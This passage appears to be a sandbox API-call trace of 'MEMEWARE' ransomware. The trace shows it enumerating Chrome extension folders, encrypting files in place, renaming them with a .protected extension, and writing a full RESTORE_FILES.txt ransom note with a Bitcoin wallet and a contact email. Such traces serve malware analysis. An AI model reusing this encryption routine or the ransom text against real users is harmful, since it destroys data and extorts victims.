lpString2=".") returned 1 [0080.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.037] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.037] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.037] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.037] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.037] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.038] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.038] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0080.039] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.039] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.039] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.039] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.039] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.039] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.040] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.040] CloseHandle (hObject=0x168) returned 1 [0080.040] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.protected") returned 168 [0080.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0080.040] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.040] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0080.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.041] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.041] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.041] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.041] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.041] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.041] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.042] CloseHandle (hObject=0x164) returned 1 [0080.042] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.042] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0080.042] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es") returned 141 [0080.042] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0080.042] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0080.042] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*") returned 143 [0080.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.042] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.042] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\.") returned 143 [0080.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.042] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.042] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.042] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\..") returned 144 [0080.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.042] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.042] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.043] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.043] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.043] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0080.043] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.043] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.044] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.044] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.044] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.044] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.044] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.044] CloseHandle (hObject=0x168) returned 1 [0080.044] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.protected") returned 165 [0080.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.protected")) returned 1 [0080.045] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.045] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0080.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.045] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.045] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.046] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.046] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.046] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.046] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.046] CloseHandle (hObject=0x164) returned 1 [0080.046] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0080.046] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419") returned 145 [0080.046] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0080.046] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0080.046] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*") returned 147 [0080.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.046] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.047] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.047] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.047] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.047] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\.") returned 147 [0080.047] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.047] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.047] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.047] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.047] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.047] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.047] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\..") returned 148 [0080.047] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.047] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.047] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 